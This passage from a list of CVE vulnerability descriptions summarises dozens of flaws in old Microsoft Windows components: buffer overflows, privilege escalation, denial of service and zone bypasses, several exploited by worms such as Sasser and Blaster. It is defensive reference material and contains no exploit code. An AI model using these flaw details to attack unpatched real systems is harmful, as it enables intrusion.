indicate that Group Policy security settings were successfully updated, even when the processing fails such as when Ntuser.pol cannot be accessed, which could cause system administrators to believe that the system is compliant with the specified settings. [CVE-2005-3170] The LDAP client on Microsoft Windows 2000 before Update Rollup 1 for SP4 accepts certificates using LDAP Secure Sockets Layer (LDAPS) even when the Certificate Authority (CA) is not trusted, which could allow attackers to trick users into believing that they are accessing a trusted site. [CVE-2005-3169] Microsoft Windows 2000 before Update Rollup 1 for SP4, when the "audit directory service access" policy is enabled, does not record a 565 event message for File Delete Child operations on an Active Directory object in the security event log, which could allow attackers to conduct unauthorized activities without detection. [CVE-2005-3168] The SECEDIT command on Microsoft Windows 2000 before Update Rollup 1 for SP4, when using a security template to set Access Control Lists (ACLs) on folders, does not apply ACLs on folders that are listed after a long folder entry, which could result in less secure permissions than specified by the template. [CVE-2005-2940] Unquoted Windows search path vulnerability in Microsoft Antispyware 1.0.509 (Beta 1) might allow local users to gain privileges via a malicious "program.exe" file in the C: folder, involving the programs (1) GIANTAntiSpywareMain.exe, (2) gcASNotice.exe, (3) gcasServ.exe, (4) gcasSWUpdater.exe, or (5) GIANTAntiSpywareUpdater.exe. NOTE: it is not clear whether this overlaps CVE-2005-2935. [CVE-2005-2935] Unquoted Windows search path vulnerability in Microsoft AntiSpyware might allow local users to execute code via a malicious c:\program.exe file, which is run by AntiSpywareMain.exe when it attempts to execute gsasDtServ.exe. NOTE: it is not clear whether this overlaps CVE-2005-2940. [CVE-2005-2388] Buffer overflow in a certain USB driver, as used on Microsoft Windows, allows attackers to execute arbitrary code. [CVE-2005-2307] netman.dll in Microsoft Windows Connections Manager Library allows local users to cause a denial of service (Network Connections Service crash) via a large integer argument to a particular function, aka "Network Connection Manager Vulnerability." [CVE-2005-2128] QUARTZ.DLL in Microsoft Windows Media Player 9 allows remote attackers to write a null byte to arbitrary memory via an AVI file with a crafted strn element with a modified length value. [CVE-2005-2122] Windows Shell for Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 allows remote attackers to execute arbitrary commands via a shortcut (.lnk) file with long font properties that lead to a buffer overflow in the Client/Server Runtime Server Subsystem (CSRSS), a different vulnerability than CVE-2005-2118. [CVE-2005-2120] Stack-based buffer overflow in the Plug and Play (PnP) service (UMPNPMGR.DLL) in Microsoft Windows 2000 SP4, and XP SP1 and SP2, allows remote or local authenticated attackers to execute arbitrary code via a large number of "\" (backslash) characters in a registry key name, which triggers the overflow in a wsprintfW function call. [CVE-2005-2118] Windows Shell for Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 allows remote user-assisted attackers to execute arbitrary commands via a crafted shortcut (.lnk) file with long font properties that lead to a buffer overflow when the user views the file's properties using Windows Explorer, a different vulnerability than CVE-2005-2122. [CVE-2005-2117] Web View in Windows Explorer on Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 does not properly handle certain HTML characters in preview fields, which allows remote user-assisted attackers to execute arbitrary code. [CVE-2005-1987] Buffer overflow in Collaboration Data Objects (CDO), as used in Microsoft Windows and Microsoft Exchange Server, allows remote attackers to execute arbitrary code when CDOSYS or CDOEX processes an e-mail message with a large header name, as demonstrated using the "Content-Type" string. [CVE-2005-1985] The Client Service for NetWare (CSNW) on Microsoft Windows 2000 SP4, XP SP1 and Sp2, and Server 2003 SP1 and earlier, allows remote attackers to execute arbitrary code due to an "unchecked buffer" when processing certain crafted network messages. [CVE-2005-1984] Buffer overflow in the Print Spooler service (Spoolsv.exe) for Microsoft Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code via a malicious message. [CVE-2005-1983] Stack-based buffer overflow in the Plug and Play (PnP) service for Microsoft Windows 2000 and Windows XP Service Pack 1 allows remote attackers to execute arbitrary code via a crafted packet, and local users to gain privileges via a malicious application, as exploited by the Zotob (aka Mytob) worm. [CVE-2005-1982] Unknown vulnerability in the PKINIT Protocol for Microsoft Windows 2000, Windows XP, and Windows Server 2003 could allow a local user to obtain information and spoof a server via a man-in-the-middle (MITM) attack between a client and a domain controller when PKINIT smart card authentication is being used. [CVE-2005-1980] Distributed Transaction Controller in Microsoft Windows allows remote servers to cause a denial of service (MSDTC service hang) via a crafted Transaction Internet Protocol (TIP) message that causes DTC to repeatedly connect to a target IP and port number after an error occurs, aka the "Distributed TIP Vulnerability." [CVE-2005-1979] Distributed Transaction Controller in Microsoft Windows allows remote servers to cause a denial of service (MSDTC service exception and exit) via an "unexpected protocol command during the reconnection request," which is not properly handled by the Transaction Internet Protocol (TIP) functionality. [CVE-2005-1978] COM+ in Microsoft Windows does not properly "create and use memory structures," which allows local users or remote attackers to execute arbitrary code. [CVE-2005-1793] User32.DLL in Microsoft Windows 98SE, and possibly other operating systems, allows local and remote attackers to cause a denial of service (crash) via an icon (.ico) bitmap file with large width and height values. [CVE-2005-1219] Buffer overflow in the Microsoft Color Management Module for Windows allows remote attackers to execute arbitrary code via an image with crafted ICC profile format tags. [CVE-2005-1218] The Microsoft Windows kernel in Microsoft Windows 2000 Server, Windows XP, and Windows Server 2003 allows remote attackers to cause a denial of service (crash) via crafted Remote Desktop Protocol (RDP) requests. [CVE-2005-1208] Integer overflow in Microsoft Windows 98, 2000, XP SP2 and earlier, and Server 2003 SP1 and earlier allows remote attackers to execute arbitrary code via a crafted compiled Help (.CHM) file with a large size field that triggers a heap-based buffer overflow, as demonstrated using a "ms-its:" URL in Internet Explorer. [CVE-2005-1207] Buffer overflow in the Web Client service in Microsoft Windows XP and Windows Server 2003 allows remote authenticated users to execute arbitrary code via a crafted WebDAV request containing special parameters. [CVE-2005-1206] Buffer overflow in the Server Message Block (SMB) functionality for Microsoft Windows 2000, XP SP1 and SP2, and Server 2003 and SP1 allows remote attackers to execute arbitrary code via unknown vectors, aka the "Server Message Block Vulnerability." [CVE-2005-1205] The Telnet client for Microsoft Windows XP, Windows Server 2003, and Windows Services for UNIX allows remote attackers to read sensitive environment variables via the NEW-ENVIRON option with a SEND ENV_USERVAR command. [CVE-2005-0852] Microsoft Windows XP SP1 allows local users to cause a denial of service (system crash) via an empty datagram to a raw IP over IP socket (IP protocol 4), as originally demonstrated using code in Python 2.3. [CVE-2005-0551] Stack-based buffer overflow in WINSRV.DLL in the Client Server Runtime System (CSRSS) process of Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to gain privileges via a specially-designed application that provides console window information with a long FaceName value. [CVE-2005-0550] Buffer overflow in Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to cause a denial of service (i.e., system crash) via a malformed request, aka "Object Management Vulnerability". [CVE-2005-0545] Microsoft Windows XP Pro SP2 and Windows 2000 Server SP4 running Active Directory allow local users to bypass group policies that restrict access to hidden drives by using the browse feature in Office 10 applications such as Word or Excel, or using a flash drive. NOTE: this issue has been disputed in a followup post. [CVE-2005-0063] The document processing application used by the Windows Shell in Microsoft Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code by modifying the CLSID stored in a file so that it is processed by HTML Application Host (MSHTA), as demonstrated using a Microsoft Word document. [CVE-2005-0061] The kernel of Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to gain privileges via certain access requests. [CVE-2005-0060] Buffer overflow in the font processing component of Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to gain privileges via a specially-designed application. [CVE-2005-0059] Buffer overflow in the Message Queuing component of Microsoft Windows 2000 and Windows XP SP1 allows remote attackers to execute arbitrary code via a crafted message. [CVE-2005-0058] Buffer overflow in the Telephony Application Programming Interface (TAPI) for Microsoft Windows 98, Windows 98 SE, Windows ME, Windows 2000, Windows XP, and Windows Server 2003 allows attackers elevate privileges or execute arbitrary code via a crafted message. [CVE-2005-0048] Microsoft Windows XP SP2 and earlier, 2000 SP3 and SP4, Server 2003, and older operating systems allows remote attackers to cause a denial of service and possibly execute arbitrary code via crafted IP packets with malformed options, aka the "IP Validation Vulnerability." [CVE-2004-2527] The local and remote desktop login screens in Microsoft Windows XP before SP2 and 2003 allow remote attackers to cause a denial of service (CPU and memory consumption) by repeatedly using the WinKey+"U" key combination, which causes multiple copies of Windows Utility Manager to be loaded more quickly than they can be closed when the copies detect that another instance is running. [CVE-2004-2454] aMSN 0.90 for Microsoft Windows allows local users to obtain sensitive information such as hashed passwords from (1) hotlog.htm and (2) config.xml. [CVE-2004-2365] Memory leak in Microsoft Windows XP and Windows Server 2003 allows local users to cause a denial of service (memory exhaustion) by repeatedly creating and deleting directories using a non-standard tool such as smbmount. [CVE-2004-2339] DISPUTED ** Microsoft Windows 2000, XP, and possibly 2003 allows local users with the SeDebugPrivilege privilege to execute arbitrary code as kernel and read or write kernel memory via the NtSystemDebugControl function, which does not verify its pointer arguments. Note: this issue has been disputed, since Administrator privileges are typically required to exploit this issue, thus privilege boundaries are not crossed. [CVE-2004-2307] Microsoft Internet Explorer 6.0.2600 on Windows XP allows remote attackers to cause a denial of service (browser crash) via a shell: URI with double backslashes (\\) in an HTML tag such as IFRAME or A. [CVE-2004-2291] Microsoft Windows Internet Explorer 5.5 and 6.0 allows remote attackers to execute arbitrary code via an embedded script that uses Shell Helper objects and a shortcut (link) to execute the target script. [CVE-2004-2290] Microsoft Windows XP Explorer allows attackers to execute arbitrary code via a HTML and script in a self-executing folder that references an executable file within the folder, which is automatically executed when a user accesses the folder. [CVE-2004-2289] Microsoft Windows XP Explorer allows local users to execute arbitrary code via a system folder with a Desktop.ini file containing a .ShellClassInfo specifier with a CLSID value that is associated with an executable file. [CVE-2004-2176] The Internet Connection Firewall (ICF) in Microsoft Windows XP SP2 is configured by default to trust sessmgr.exe, which allows local users to use sessmgr.exe to create a local listening port that bypasses the ICF access controls. [CVE-2004-1889] Unknown vulnerability in ftpd in SGI IRIX 6.5.20 through 6.5.23 allows remote attackers to cause a denial of service (hang) via a link failure with Microsoft Windows. [CVE-2004-1325] The getItemInfoByAtom function in the ActiveX control for Microsoft Windows Media Player 9.0 returns a 0 if the file does not exist and the size of the file if the file exists, which allows remote attackers to determine the existence of files on the local system. [CVE-2004-1324] The Microsoft Windows Media Player 9.0 ActiveX control may allow remote attackers to execute arbitrary web script in the Local computer zone via the (1) artist or (2) song fields of a music file, if the file is processed using Internet Explorer. [CVE-2004-1080] The WINS service (wins.exe) on Microsoft Windows NT Server 4.0, Windows 2000 Server, and Windows Server 2003 allows remote attackers to write to arbitrary memory locations and possibly execute arbitrary code via a modified memory pointer in a WINS replication packet to TCP port 42, aka the "Association Context Vulnerability." [CVE-2004-1049] Integer overflow in the LoadImage API of the USER32 Lib for Microsoft Windows allows remote attackers to execute arbitrary code via a .bmp, .cur, .ico or .ani file with a large image size field, which leads to a buffer overflow, aka the "Cursor and Icon Format Handling Vulnerability." [CVE-2004-0901] Microsoft Word for Windows 6.0 Converter (MSWRD632.WPC), as used in WordPad, does not properly validate certain data lengths, which allows remote attackers to execute arbitrary code via a .wri, .rtf, and .doc file sent by email or malicious web site, aka "Font Conversion Vulnerability," a different vulnerability than CVE-2004-0571. [CVE-2004-0900] The DHCP Server service for Microsoft Windows NT 4.0 Server and Terminal Server Edition does not properly validate the length of certain messages, which allows remote attackers to execute arbitrary code via a malformed DHCP message, aka the "DHCP Request Vulnerability." [CVE-2004-0899] The DHCP Server service for Microsoft Windows NT 4.0 Server and Terminal Server Edition, with DHCP logging enabled, does not properly validate the length of certain messages, which allows remote attackers to cause a denial of service (application crash) via a malformed DHCP message, aka "Logging Vulnerability." [CVE-2004-0897] The Indexing Service for Microsoft Windows XP and Server 2003 does not properly validate the length of a message, which allows remote attackers to execute arbitrary code via a buffer overflow attack. [CVE-2004-0840] The SMTP (Simple Mail Transfer Protocol) component of Microsoft Windows XP 64-bit Edition, Windows Server 2003, Windows Server 2003 64-bit Edition, and the Exchange Routing Engine component of Exchange Server 2003, allows remote attackers to execute arbitrary code via a malicious DNS response message containing length values that are not properly validated. [CVE-2004-0727] Microsoft Internet Explorer 6.0.2800.1106 on Microsoft Windows XP SP2, and other versions including 5.01 and 5.5, allows remote web servers to bypass zone restrictions and execute arbitrary code in the local computer zone by redirecting a function to another function with the same name, as demonstrated by SimilarMethodNameRedir, aka the "Similar Method Name Redirection Cross Domain Vulnerability." [CVE-2004-0726] The Windows Media Player control in Microsoft Windows 2000 allows remote attackers to execute arbitrary script in the local computer zone via an ASX filename that contains javascript, which is executed in the local context in a preview panel. [CVE-2004-0575] Integer overflow in DUNZIP32.DLL for Microsoft Windows XP, Windows XP 64-bit Edition, Windows Server 2003, and Windows Server 2003 64-bit Edition allows remote attackers to execute arbitrary code via compressed (zipped) folders that involve an "unchecked buffer" and improper length validation. [CVE-2004-0574] The Network News Transfer Protocol (NNTP) component of Microsoft Windows NT Server 4.0, Windows 2000 Server, Windows Server 2003, Exchange 2000 Server, and Exchange Server 2003 allows remote attackers to execute arbitrary code via XPAT patterns, possibly related to improper length validation and an "unchecked buffer," leading to off-by-one and heap-based buffer overflows. [CVE-2004-0571] Microsoft Word for Windows 6.0 Converter does not properly validate certain data lengths, which allows remote attackers to execute arbitrary code via a .wri, .rtf, and .doc file sent by email or malicious web site, aka "Table Conversion Vulnerability," a different vulnerability than CVE-2004-0901. [CVE-2004-0569] The RPC Runtime Library for Microsoft Windows NT 4.0 allows remote attackers to read active memory or cause a denial of service (system crash) via a malicious message, possibly related to improper length values. [CVE-2004-0540] Microsoft Windows 2000, when running in a domain whose Fully Qualified Domain Name (FQDN) is exactly 8 characters long, does not prevent users with expired passwords from logging on to the domain. [CVE-2004-0503] Microsoft Outlook 2003 allows remote attackers to bypass the default zone restrictions and execute script within media files via a Rich Text Format (RTF) message containing an OLE object for the Windows Media Player, which bypasses Media Player's setting to disallow scripting and may lead to unprompted installation of an executable when exploited in conjunction with predictable-file-location exposures such as CVE-2004-0502. [CVE-2004-0214] Buffer overflow in Microsoft Internet Explorer and Explorer on Windows XP SP1, WIndows 2000, Windows 98, and Windows Me may allow remote malicious servers to cause a denial of service (application crash) and possibly execute arbitrary code via long share names, as demonstrated using Samba. [CVE-2004-0211] The kernel for Microsoft Windows Server 2003 does not reset certain values in CPU data structures, which allows local users to cause a denial of service (system crash) via a malicious program. [CVE-2004-0210] The POSIX component of Microsoft Windows NT and Windows 2000 allows local users to execute arbitrary code via certain parameters, possibly by modifying message length values and causing a buffer overflow. [CVE-2004-0209] Unknown vulnerability in the Graphics Rendering Engine processes of Microsoft Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code via (1) Windows Metafile (WMF) or (2) Enhanced Metafile (EMF) image formats that involve "an unchecked buffer." [CVE-2004-0208] The Virtual DOS Machine (VDM) subsystem of Microsoft Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 allows local users to access kernel memory and gain privileges via a malicious program that modified some system structures in a way that is not properly validated by privileged operating system functions. [CVE-2004-0207] "Shatter" style vulnerability in the Window Management application programming interface (API) for Microsoft Windows 98, Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 allows local users to gain privileges by using certain API functions to change properties of privileged programs using the SetWindowLong and SetWIndowLongPtr API functions. [CVE-2004-0206] Network Dynamic Data Exchange (NetDDE) services for Microsoft Windows 98, Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 allows attackers to remotely execute arbitrary code or locally gain privileges via a malicious message or application that involves an "unchecked buffer," possibly a buffer overflow. [CVE-2004-0202] IDirectPlay4 Application Programming Interface (API) of Microsoft DirectPlay 7.0a thru 9.0b, as used in Windows Server 2003 and earlier allows remote attackers to cause a denial of service (application crash) via a malformed packet. [CVE-2004-0201] Heap-based buffer overflow in the HtmlHelp program (hh.exe) in HTML Help for Microsoft Windows 98, Me, NT 4.0, 2000, XP, and Server 2003 allows remote attackers to execute arbitrary commands via a .CHM file with a large length field, a different vulnerability than CVE-2003-1041. [CVE-2004-0199] Help and Support Center in Microsoft Windows XP and Windows Server 2003 SP1 does not properly validate HCP URLs, which allows remote attackers to execute arbitrary code, as demonstrated using certain hcp:// URLs that access the DVD Upgrade capability (dvdupgrd.htm). [CVE-2004-0124] The DCOM RPC interface for Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to cause network communications via an "alter context" call that contains additional data, aka the "Object Identity Vulnerability." [CVE-2004-0120] The Microsoft Secure Sockets Layer (SSL) library, as used in Windows 2000, Windows XP, and Windows Server 2003, allows remote attackers to cause a denial of service via malformed SSL messages. [CVE-2004-0116] An Activation function in the RPCSS Service involved with DCOM activation for Microsoft Windows 2000, XP, and 2003 allows remote attackers to cause a denial of service (memory consumption) via an activation request with a large length field. [CVE-2003-1107] The DHTML capability in Microsoft Windows Media Player (WMP) 6.4, 7.0, 7.1, and 9 may run certain URL commands from a security zone that is less trusted than the current zone, which allows attackers to bypass intended access restrictions. [CVE-2003-1106] The SMTP service in Microsoft Windows 2000 before SP4 allows remote attackers to cause a denial of service (crash or hang) via an e-mail message with a malformed time stamp in the FILETIME attribute. [CVE-2003-0908] The Utility Manager in Microsoft Windows 2000 executes winhlp32.exe with system privileges, which allows local users to execute arbitrary code via a "Shatter" style attack using a Windows message that accesses the context sensitive help button in the GUI, as demonstrated using the File Open dialog in the Help window, a different vulnerability than CVE-2004-0213. [CVE-2003-0907] Help and Support Center in Microsoft Windows XP SP1 does not properly validate HCP URLs, which allows remote attackers to execute arbitrary code via quotation marks in an hcp:// URL, which are not quoted when constructing the argument list to HelpCtr.exe. [CVE-2003-0906] Buffer overflow in the rendering for (1) Windows Metafile (WMF) or (2) Enhanced Metafile (EMF) image formats in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, and XP SP1 allows remote attackers to execute arbitrary code via a malformed WMF or EMF image. [CVE-2003-0904] Microsoft Exchange 2003 and Outlook Web Access (OWA), when configured to use NTLM authentication, does not properly reuse HTTP connections, which can cause OWA users to view mailboxes of other users when Kerberos has been disabled as an authentication method for IIS 6.0, e.g. when SharePoint Services 2.0 is installed. [CVE-2003-0839] Directory traversal vulnerability in the "Shell Folders" capability in Microsoft Windows Server 2003 allows remote attackers to read arbitrary files via .. (dot dot) sequences in a "shell:" link. [CVE-2003-0825] The Windows Internet Naming Service (WINS) for Microsoft Windows Server 2003, and possibly Windows NT and Server 2000, does not properly validate the length of certain packets, which allows attackers to cause a denial of service and possibly execute arbitrary code. [CVE-2003-0818] Multiple integer overflows in Microsoft ASN.1 library (MSASN1.DLL), as used in LSASS.EXE, CRYPT32.DLL, and other Microsoft executables and libraries on Windows NT 4.0, 2000, and XP, allow remote attackers to execute arbitrary code via ASN.1 BER encodings with (1) very large length fields that cause arbitrary heap data to be overwritten, or (2) modified bit strings. [CVE-2003-0807] Buffer overflow in the COM Internet Services and in the RPC over HTTP Proxy components for Microsoft Windows NT Server 4.0, NT 4.0 Terminal Server Edition, 2000, XP, and Server 2003 allows remote attackers to cause a denial of service via a crafted request. [CVE-2003-0806] Buffer overflow in the Windows logon process (winlogon) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, and XP SP1, when a member of a domain, allows remote attackers to execute arbitrary code. [CVE-2003-0719] Buffer overflow in the Private Communications Transport (PCT) protocol implementation in the Microsoft SSL library, as used in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code via PCT 1.0 handshake packets. [CVE-2003-0662] Buffer overflow in Troubleshooter ActiveX Control (Tshoot.ocx) in Microsoft Windows 2000 SP4 and earlier allows remote attackers to execute arbitrary code via an HTML document with a long argument to the RunQuery2 method. [CVE-2003-0660] The Authenticode capability in Microsoft Windows NT through Server 2003 does not prompt the user to download and install ActiveX controls when the system is low on memory, which could allow remote attackers execute arbitrary code without user approval. [CVE-2003-0604] Windows Media Player (WMP) 7 and 8, as running on Internet Explorer and possibly other Microsoft products that process HTML, allows remote attackers to bypass zone restrictions and access or execute arbitrary files via an IFRAME tag pointing to an ASF file whose Content-location contains a File:// URL. [CVE-2003-0533] Stack-based buffer overflow in certain Active Directory service functions in LSASRV.DLL of the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code via a packet that causes the DsRolerUpgradeDownlevelServer function to create long debug entries for the DCPROMO.LOG log file, as exploited by the Sasser worm. [CVE-2003-0496] Microsoft SQL Server before Windows 2000 SP4 allows local users to gain privileges as the SQL Server user by calling the xp_fileexist extended stored procedure with a named pipe as an argument instead of a normal file. [CVE-2003-0352] Buffer overflow in a certain DCOM interface for RPC in Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to execute arbitrary code via a malformed message, as exploited by the Blaster/MSblast/LovSAN and Nachi/Welchia worms. [CVE-2003-0349] Buffer overflow in the streaming media component for logging multicast requests in the ISAPI for the logging capability of Microsoft Windows Media Services (nsiislog.dll), as installed in IIS 5.0, allows remote attackers to execute arbitrary code via a large POST request to nsiislog.dll. [CVE-2003-0348] A certain Microsoft Windows Media Player 9 Series ActiveX control allows remote attackers to view and manipulate the Media Library on the local system via HTML script. [CVE-2003-0346] Multiple integer overflows in a Microsoft Windows DirectX MIDI library (QUARTZ.DLL) allow remote attackers to execute arbitrary code via a MIDI (.mid) file with (1) large length for a Text or Copyright string, or (2) a large number of tracks, which leads to a heap-based buffer overflow. [CVE-2003-0345] Buffer overflow in the SMB capability for Microsoft Windows XP, 2000, and NT allows remote attackers to cause a denial of service and possibly execute arbitrary code via an SMB packet that specifies a smaller buffer length than is required. [CVE-2003-0228] Directory traversal vulnerability in Microsoft Windows Media Player 7.1 and Windows Media Player for Windows XP allows remote attackers to execute arbitrary code via a skins file with a URL containing hex-encoded backslash characters (%5C) that causes an executable to be placed in an arbitrary location. [CVE-2003-0227] The logging capability for unicast and multicast transmissions in the ISAPI extension for Microsoft Windows Media Services in Microsoft Windows NT 4.0 and 2000, nsiislog.dll, allows remote attackers to cause a denial of service in Internet Information Server (IIS) and execute arbitrary code via a certain network request. [CVE-2003-0111] The ByteCode Verifier component of Microsoft Virtual Machine (VM) build 5.0.3809 and earlier, as used in Windows and Internet Explorer, allows remote attackers to bypass security checks and execute arbitrary code via a malicious Java applet, aka "Flaw in Microsoft VM Could Enable System Compromise." [CVE-2003-0109] Buffer overflow in ntdll.dll on Microsoft Windows NT 4.0, Windows NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows remote attackers to execute arbitrary code, as demonstrated via a WebDAV request to IIS 5.0. [CVE-2003-0009] Cross-site scripting (XSS) vulnerability in Help and Support Center for Microsoft Windows Me allows remote attackers to execute arbitrary script in the Local Computer security context via an hcp:// URL with the malicious script in the topic parameter. [CVE-2003-0004] Buffer overflow in the Windows Redirector function in Microsoft Windows XP allows local users to execute arbitrary code via a long parameter. [CVE-2003-0003] Buffer overflow in the RPC Locator service for Microsoft Windows NT 4.0, Windows NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows local users to execute arbitrary code via an RPC call to the service containing certain parameter information. [CVE-2002-2328] Active Directory in Windows 2000, when supporting Kerberos V authentication and GSSAPI, allows remote attackers to cause a denial of service (hang) via an LDAP client that sets the page length to zero during a large request. [CVE-2002-2283] Microsoft Windows XP with Fast User Switching (FUS) enabled does not remove the "show processes from all users" privilege when the user is removed from the administrator group, which allows that user to view prosesses of other users. [CVE-2002-2117] Microsoft Windows XP allows remote attackers to cause a denial of service (CPU consumption) by flooding UDP port 500 (ISAKMP). [CVE-2002-2105] Microsoft Windows XP allows local users to prevent the system from booting via a corrupt explorer.exe.manifest file. [CVE-2002-2073] Cross-site scripting (XSS) vulnerability in the default ASP pages on Microsoft Site Server 3.0 on Windows NT 4.0 allows remote attackers to inject arbitrary web script or HTML via the (1) ctr parameter in Default.asp and (2) the query string to formslogin.asp. [CVE-2002-1984] Microsoft Internet Explorer 5.0.1 through 6.0 on Windows 2000 or Windows XP allows remote attackers to cause a denial of service (crash) via an OBJECT tag that contains a crafted CLASSID (CLSID) value of "CLSID:00022613-0000-0000-C000-000000000046". [CVE-2002-1933] The terminal services screensaver for Microsoft Windows 2000 does not automatically lock the terminal window if the window is minimized, which could allow local users to gain access to the terminal server window. [CVE-2002-1932] Microsoft Windows XP and Windows 2000, when configured to send administrative alerts and the "Do not overwrite events (clear log manually)" option is set, does not notify the administrator when the log reaches its maximum size, which allows local users and remote attackers to avoid detection. [CVE-2002-1847] Buffer overflow in mplay32.exe of Microsoft Windows Media Player (WMP) 6.3 through 7.1 allows remote attackers to execute arbitrary commands via a long mp3 filename command line argument. NOTE: since the only known attack vector requires command line access, this may not be a vulnerability. [CVE-2002-1844] Microsoft Windows Media Player (WMP) 6.3, when installed on Solaris, installs executables with world-writable permissions, which allows local users to delete or modify the executables to gain privileges. [CVE-2002-1712] Microsoft Windows 2000 allows remote attackers to cause a denial of service (memory consumption) by sending a flood of empty TCP/IP packets with the ACK and FIN bits set to the NetBIOS port (TCP/139), as demonstrated by stream3. [CVE-2002-1692] Buffer overflow in backup utility of Microsoft Windows 95 allows attackers to execute arbitrary code by causing a filename with a long extension to be placed in a folder to be backed up. [CVE-2002-1670] Microsoft Windows XP Professional upgrade edition overwrites previously installed patches for Internet Explorer 6.0, leaving Internet Explorer unpatched. [CVE-2002-1327] Buffer overflow in the Windows Shell function in Microsoft Windows XP allows remote attackers to execute arbitrary code via an .MP3 or .WMA audio file with a corrupt custom attribute, aka "Unchecked Buffer in Windows Shell Could Enable System Compromise." [CVE-2002-1256] The SMB signing capability in the Server Message Block (SMB) protocol in Microsoft Windows 2000 and Windows XP allows attackers to disable the digital signing settings in an SMB session to force the data to be sent unsigned, then inject data into the session without detection, e.g. by modifying group policy information sent from a domain controller. [CVE-2002-1214] Buffer overflow in Microsoft PPTP Service on Windows XP and Windows 2000 allows remote attackers to cause a denial of service (hang) and possibly execute arbitrary code via a certain PPTP packet with malformed control data. [CVE-2002-1184] The system root folder of Microsoft Windows 2000 has default permissions of Everyone group with Full access (Everyone:F) and is in the search path when locating programs during login or application launch from the desktop, which could allow attackers to gain privileges as other users via Trojan horse programs. [CVE-2002-1183] Microsoft Windows 98 and Windows NT 4.0 do not properly verify the Basic Constraints of digital certificates, allowing remote attackers to execute code, aka "New Variant of Certificate Validation Flaw Could Enable Identity Spoofing" (CAN-2002-0862). [CVE-2002-1141] An input validation error in the Sun Microsystems RPC library Services for Unix 3.0 Interix SD, as implemented on Microsoft Windows NT4, 2000, and XP, allows remote attackers to cause a denial of service via malformed fragmented RPC client packets, aka "Denial of service by sending an invalid RPC request." [CVE-2002-1140] The Sun Microsystems RPC library Services for Unix 3.0 Interix SD, as implemented on Microsoft Windows NT4, 2000, and XP, allows remote attackers to cause a denial of service (service hang) via malformed packet fragments, aka "Improper parameter size check leading to denial of service." [CVE-2002-1139] The Compressed Folders feature in Microsoft Windows 98 with Plus! Pack, Windows Me, and Windows XP does not properly check the destination folder during the decompression of ZIP files, which allows attackers to place an executable file in a known location on a user's system, aka "Incorrect Target Path for Zipped File Decompression." [CVE-2002-0864] The Remote Data Protocol (RDP) version 5.1 in Microsoft Windows XP allows remote attackers to cause a denial of service (crash) when Remote Desktop is enabled via a PDU Confirm Active data packet that does not set the Pattern BLT command, aka "Denial of Service in Remote Desktop." [CVE-2002-0863] Remote Data Protocol (RDP) version 5.0 in Microsoft Windows 2000 and RDP 5.1 in Windows XP does not encrypt the checksums of plaintext session data, which could allow a remote attacker to determine the contents of encrypted sessions via sniffing, aka "Weak Encryption in RDP Protocol." [CVE-2002-0862] The (1) CertGetCertificateChain, (2) CertVerifyCertificateChainPolicy, and (3) WinVerifyTrust APIs within the CryptoAPI for Microsoft products including Microsoft Windows 98 through XP, Office for Mac, Internet Explorer for Mac, and Outlook Express for Mac, do not properly verify the Basic Constraints of intermediate CA-signed X.509 certificates, which allows remote attackers to spoof the certificates of trusted sites via a man-in-the-middle attack for SSL sessions, as originally reported for Internet Explorer and IIS. [CVE-2002-0724] Buffer overflow in SMB (Server Message Block) protocol in Microsoft Windows NT, Windows 2000, and Windows XP allows attackers to cause a denial of service (crash) via a SMB_COM_TRANSACTION packet with a request for the (1) NetShareEnum, (2) NetServerEnum2, or (3) NetServerEnum3, aka "Unchecked Buffer in Network Share Provider Can Lead to Denial of Service". [CVE-2002-0699] Unknown vulnerability in the Certificate Enrollment ActiveX Control in Microsoft Windows 98, Windows 98 Second Edition, Windows Millennium, Windows NT 4.0, Windows 2000, and Windows XP allow remote attackers to delete digital certificates on a user's system via HTML. [CVE-2002-0694] The HTML Help facility in Microsoft Windows 98, 98 Second Edition, Millennium Edition, NT 4.0, NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP uses the Local Computer Security Zone when opening .chm files from the Temporary Internet Files folder, which allows remote attackers to execute arbitrary code via HTML mail that references or inserts a malicious .chm file containing shortcuts that can be executed, aka "Code Execution via Compiled HTML Help File." [CVE-2002-0693] Buffer overflow in the HTML Help ActiveX Control (hhctrl.ocx) in Microsoft Windows 98, 98 Second Edition, Millennium Edition, NT 4.0, NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows remote attackers to execute code via (1) a long parameter to the Alink function, or (2) script containing a long argument to the showHelp function. [CVE-2002-0619] The Mail Merge Tool in Microsoft Word 2002 for Windows, when Microsoft Access is present on a system, allows remote attackers to execute Visual Basic (VBA) scripts within a mail merge document that is saved in HTML format, aka a "Variant of MS00-071, Word Mail Merge Vulnerability" (CVE-2000-0788). [CVE-2002-0618] The Macro Security Model in Microsoft Excel 2000 and 2002 for Windows allows remote attackers to execute code in the Local Computer zone by embedding HTML scripts within an Excel workbook that contains an XSL stylesheet, aka "Excel XSL Stylesheet Script Execution". [CVE-2002-0617] The Macro Security Model in Microsoft Excel 2000 and 2002 for Windows 